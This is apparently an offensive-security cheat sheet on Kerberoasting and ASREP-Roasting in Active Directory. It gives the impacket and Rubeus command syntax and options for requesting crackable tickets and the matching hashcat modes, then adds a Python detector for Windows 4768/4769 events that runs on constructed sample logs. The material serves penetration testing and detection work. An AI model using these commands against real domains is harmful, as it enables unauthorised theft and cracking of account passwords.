# Roasting

## Kerberoasting

In Active Directory, any authenticated domain user can request a Service Ticket (ST) for any domain account that has a Service Principal Name (SPN) registered, since the KDC does not check whether the requester is actually authorised to use the service.

The ticket returned by the KDC is partially encrypted with the Kerberos key (derived from the account password) of the account tied to the service. That encrypted portion can therefore be taken offline and the service account password cracked by guessing candidate passwords and checking whether they decrypt the ST.

{% hint style="info" %}
The hashcat mode for the default RC4 encrypted TGS-REP ticket is 13100
{% endhint %}

{% tabs %}
{% tab title="impacket-getUserSPNs" %}
{% embed url="https://github.com/fortra/impacket" %}

{% code title="Linux (Attacker)" %}

```bash
GetUserSPNs.py [domain/username]<:password> <options>

OPTIONS
-hashes [LMHASH:NTHASH]            NTLM Hashes, Format is LMHASH:NTHASH
-dc-ip [IP]                        IP Address Of The Domain Controller
-outputfile [file]                 Output Filename
-request                           Requests TGS For Users
-format                            Hashcat | John
```

{% endcode %}
{% endtab %}

{% tab title="Rubeus" %}
{% embed url="https://github.com/GhostPack/Rubeus#kerberoast" %}

{% code title="Windows" %}

```powershell
Rubeus.exe kerberoast <options>

OPTIONS
/spn:                    Kerberoast Only A Specific SPN
/user:                   Kerberoast Only A Specific User
/outfile:                Writes Kerberoasted Hashes To A File
/nowrap                  Don't Wrap Kerberoast Results (Easier For Copy Paste)
/tgtdeleg                Request RC4 Tickets From Accounts With AES Enabled
/rc4opsec                Only Kerberoast Accounts Without AES Enabled
```

{% endcode %}
{% endtab %}
{% endtabs %}

## ASREP-Roasting

In Kerberos authentication, a user normally has to perform Pre-Authentication before the KDC issues a TGT: the client sends a timestamp encrypted with the user's Kerberos key (derived from the account password), proving knowledge of the password up front.

If Pre-Authentication is disabled for an account (the *DONT\_REQUIRE\_PREAUTH* flag is set), an attacker can send an AS-REQ for that account without knowing its password. The KDC's **AS-REP** response contains an encrypted part (holding the session key) that is encrypted with the account's Kerberos key. That encrypted part can be taken offline and cracked to recover the account's password.

{% hint style="info" %}
The hashcat mode for the AS-REP ticket is 18200
{% endhint %}

{% tabs %}
{% tab title="impacket-getNPUsers" %}
{% embed url="https://github.com/fortra/impacket" %}

{% code title="Linux" %}

```bash
GetNPUsers.py [domain/username]<:password> <options>

OPTIONS
-hashes [LMHASH:NTHASH]            NTLM Hashes, Format is LMHASH:NTHASH
-dc-ip [ip]                        IP Address Of The Domain Controller
-outputfile [file]                 Output Filename
-request                           Requests AS-REP For Users
-format                            Hashcat | John
```

{% endcode %}
{% endtab %}

{% tab title="Rubeus" %}
{% embed url="https://github.com/GhostPack/Rubeus#kerberoast" %}

{% code title="Windows" %}

```powershell
Rubeus.exe asreproast <options>

OPTIONS
/user:                   ASREP-Roast Only A Specific User
/format:                 Output ASREP-Roast Format (Default: John The Ripper)
/outfile:                Writes ASREP-Roast Hashes To A File
/nowrap                  Don't Wrap ASREP-Roast Results (Easier For Copy Paste)
```

{% endcode %}
{% endtab %}
{% endtabs %}
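Both techniques above leave a recognisable footprint on the domain controller: Kerberoasting shows up as 4769 service-ticket requests for user (non-machine) SPN accounts with RC4 encryption (etype 0x17, the type hashcat modes 13100/18200 target), often many distinct services from one client in a short span; ASREP-Roasting shows up as 4768 TGT requests with pre-authentication type 0 and RC4. The following is an added detection example, not part of the original page or any tool it references; the event records are constructed to mimic 4768/4769 fields and the sweep threshold is an assumed value.

```python
"""Flag Kerberoasting / ASREP-Roasting indicators in Windows Security events (added example)."""
from collections import defaultdict

RC4_HMAC = "0x17"     # etype 23: the ticket type that hashcat modes 13100 / 18200 crack
SWEEP_THRESHOLD = 3   # distinct RC4 service tickets from one client (assumed threshold)

# Constructed sample events shaped like 4768/4769 event fields; not real logs.
SAMPLE_EVENTS = [
    {"EventID": 4769, "TargetUserName": "alice@CORP.LOCAL", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.5", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "alice@CORP.LOCAL", "ServiceName": "svc_web",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.5", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "alice@CORP.LOCAL", "ServiceName": "svc_backup",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.5", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "bob@CORP.LOCAL", "ServiceName": "FS01$",
     "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.9", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "svc_legacy", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x17", "PreAuthType": "0", "IpAddress": "10.0.0.5", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "carol", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "PreAuthType": "2", "IpAddress": "10.0.0.7", "Status": "0x0"},
]

def is_kerberoast_candidate(ev):
    """4769 issued with RC4 for a user service account (skip machine accounts and krbtgt)."""
    svc = ev.get("ServiceName", "")
    return (ev.get("EventID") == 4769 and ev.get("Status") == "0x0"
            and ev.get("TicketEncryptionType") == RC4_HMAC
            and not svc.endswith("$") and svc.lower() != "krbtgt")

def is_asrep_roast_candidate(ev):
    """4768 issued without pre-authentication (PreAuthType 0) and with RC4 encryption."""
    return (ev.get("EventID") == 4768 and ev.get("Status") == "0x0"
            and ev.get("PreAuthType") == "0"
            and ev.get("TicketEncryptionType") == RC4_HMAC)

def analyse(events):
    """Return (asrep_alerts, kerberoast_sweeps): per-event ASREP hits and per-client sweeps."""
    asrep = [(e["IpAddress"], e["TargetUserName"]) for e in events if is_asrep_roast_candidate(e)]
    per_client = defaultdict(set)
    for e in events:
        if is_kerberoast_candidate(e):
            per_client[e["IpAddress"]].add(e["ServiceName"])
    sweeps = {ip: sorted(s) for ip, s in per_client.items() if len(s) >= SWEEP_THRESHOLD}
    return asrep, sweeps

if __name__ == "__main__":
    asrep_hits, sweep_hits = analyse(SAMPLE_EVENTS)
    print("ASREP-Roast candidates:", asrep_hits)
    print("Kerberoast sweeps:", sweep_hits)
```

Accounts that legitimately still use RC4 will also match, so the RC4 filter should be paired with an inventory of which SPN accounts have AES enabled and which have *DONT\_REQUIRE\_PREAUTH* set.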
